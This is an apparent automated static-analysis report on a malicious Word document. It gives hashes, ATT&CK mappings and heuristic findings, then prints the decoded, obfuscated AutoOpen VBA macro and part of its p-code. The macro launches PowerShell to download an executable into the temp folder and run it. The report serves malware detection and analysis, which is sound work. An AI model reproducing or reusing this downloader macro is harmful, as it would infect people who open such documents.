Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b862278ccf8180c5…

MALICIOUS

Office (OLE)

Size: 57.0 KB  Created: 2017-12-01 19:05:00  Authoring application: Microsoft Office Word  First seen: 2019-09-30
MD5: d3f0bf59eb3c00210459272b0af8f78b
SHA-1: d79f557c2d8eeb905f9c4edf7f2ba92f2147cd69
SHA-256: b862278ccf8180c5b1af7378f7001399d94eecc678949044de2572d7d99b6521
Risk Score: 162

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1105 Ingress Tool Transfer

The sample contains a VBA macro with an AutoOpen function, which is a common technique for executing malicious code upon opening a document. The script uses CreateObject to instantiate a WebClient, downloads a PowerShell script from a hardcoded IP address, and saves it to the temporary directory as 'ahalaay.exe'. This PowerShell script then executes the downloaded payload.

Heuristics 6

  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://schemas.openxmlformats.org/drawingml/2006/main  In document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/bibliography  In document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/customXml  In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename    Kind        Source                                               Size
macros.bas  vba-macro   oletools.olevba.extract_macros (decoded VBA source)  5731 bytes
            SHA-256: 6e1152836b57f8589cd9fce7b1c7b47fee4a37c2f69253ddcb9841945857cf6b
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "iJHuhuuEE"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
ghUEuGUufGUe = OEjfIEhuet + VJIEfuEHt
kiiiHEHu = isdhsut.viishdh
OEjjiEIiieI = pEofOEjfiEOO + IEhufUEh + eoJFieue
KfjjIIhei = "ell"
EIjfiHEUUU = OIEJiEIHFUOO
Set pOIJiJIHuuEUUf = CreateObject( _
"" + kiiiHEHu + "p" + isdhsut.ibhuhug + "h" + KfjjIIhei + "")
pOIJiJIHuuEUUf.Run ovsJIjgijIR(), 0
End Sub
Function ovsJIjgijIR()
OEJfIUhg = "(nE"
PEfkIEJHgw = OEJfIUhg + idhuru.obsjie + "ECT ('" + idhuru.isjgkr + "'+'N'+'et.WebCli'+'en'+'t'))"
PEfkEIg = "'htt" + isjdisr.odsijie + "'"
OEJfiEif = ".('Do"
PEfkoEfijJIE = isdhsut.Caption
IEHuufe = ""
PkeJeifGeg = OEJfiEif + "wn'+'lo" + "ad'+'" + PEfkoEfijJIE + "'"
ispoHEHhpUE = ").Invoke(" + PEfkEIg + ","
OEJfiEhuuEHUteg = "'%TMP%\ahalaay.exe')"
PKEFkoEJfi = "PR"
OJEfEUhfuUE = "oC"
sfwedEFgRHEds = PKEFkoEJfi + OJEfEUhfuUE
OfkOjIejiHE = isdhsut.jixjiihd + "Rt-" + sfwedEFgRHEds + "e`sS '%TMP%\ahalaay.exe';"
oJofjiJE = idhuru.isdihs + "S" + idhuru.Caption + ""
JIhHUUfggF = oJofjiJE & PEfkIEJHgw
JHghuhuGGU = PkeJeifGeg + ispoHEHhpUE + OEJfiEhuuEHUteg + OfkOjIejiHE
uhuGEyfgyGE = JIhHUUfggF & JHghuhuGGU
udgge = "c"
jIheuGtyye = udgge + isdhsut.ibhdur
ovsJIjgijIR = jIheuGtyye + " /c " + uhuGEyfgyGE + " "
End Function

Attribute VB_Name = "idhuru"
Attribute VB_Base = "0{3343F36A-F312-4C39-8869-F1D1C8004CBA}{074600A5-B97F-48C3-B0C2-07E1E8C9AB93}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "isdhsut"
Attribute VB_Base = "0{A2D90AAD-93B1-461B-86A5-7A73E4001827}{37CFA729-20FE-4083-87B8-3C7CA95F168D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "isjdisr"
Attribute VB_Base = "0{7EBE5B37-08CD-4F27-9F34-98F20D0DC93B}{FEFBD8D8-0E76-4DC6-B384-1E8A0BE87549}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

' Processing file: /opt/analyzer/scan_staging/b3898ee1b954426992ac245e604d303f.bin
' ===============================================================================
' Module streams:
' Macros/VBA/iJHuhuuEE - 4276 bytes
' Line #0:
' 	FuncDefn (Sub kiiiHEHu())
' Line #1:
' 	Ld viishdh 
' 	Ld OEjjiEIiieI 
' 	Add 
' 	St isdhsut 
' Line #2:
' 	Ld IEhufUEh 
' 	MemLd eoJFieue 
' 	St pEofOEjfiEOO 
' Line #3:
' 	Ld EIjfiHEUUU 
' 	Ld OIEJiEIHFUOO 
' 	Add 
' 	Ld pOIJiJIHuuEUUf 
' 	Add 
' 	St KfjjIIhei 
' Line #4:
' 	LitStr 0x0003 "ell"
' 	St CreateObject 
' Line #5:
' 	Ld Run 
' 	St ibhuhug 
' Line #6:
' 	LineCont 0x0004 05 00 00 00
' 	SetStmt 
' 	LitStr 0x0000 ""
' 	Ld pEofOEjfiEOO 
' 	Add 
' 	LitStr 0x0001 "p"
' 	Add 
' 	Ld IEhufUEh 
' 	MemLd PEfkIEJHgw 
' 	Add 
' 	LitStr 0x0001 "h"
' 	Add 
' 	Ld CreateObject 
' 	Add 
' 	LitStr 0x0000 ""
' 	Add 
' 	ArgsLd OEJfIUhg 0x0001 
' 	Set ovsJIjgijIR 
' Line #7:
' 	ArgsLd obsjie 0x0000 
' 	LitDI2 0x0000 
' 	Ld ovsJIjgijIR 
' 	ArgsMemCall idhuru 0x0002 
' Line #8:
' 	EndSub 
' Line #9:
' 	FuncDefn (Function obsjie(id_FFFE As Variant))
' Line #10:
' 	LitStr 0x0003 "(nE"
' 	St isjgkr 
' Line #11:
' 	Ld isjgkr 
' 	Ld OEJfiEif 
' 	MemLd PEfkoEfijJIE 
' 	Add 
' 	LitStr 0x0006 "ECT ('"
' 	Add 
' 	Ld OEJfiEif 
' 	MemLd Caption 
' 	Add 
' 	LitStr 0x001C "'+'N'+'et.WebCli'+'en'+'t'))"
' 	Add 
' 	St PEfkEIg 
' Line #12:
' 	LitStr 0x0004 "'htt"
' 	Ld id_02CE 
' 	MemLd id_02D4 
' 	Add 
' 	LitStr 0x0001 "'"
' 	Add 
' 	St PkeJeifGeg 
' Line #13:
' 	LitStr 0x0005 ".('Do"
' 	St ispoHEHhpUE 
' Line #14:
' 	Ld IEhufUEh 
' 	MemLd PKEFkoEJfi 
... (truncated)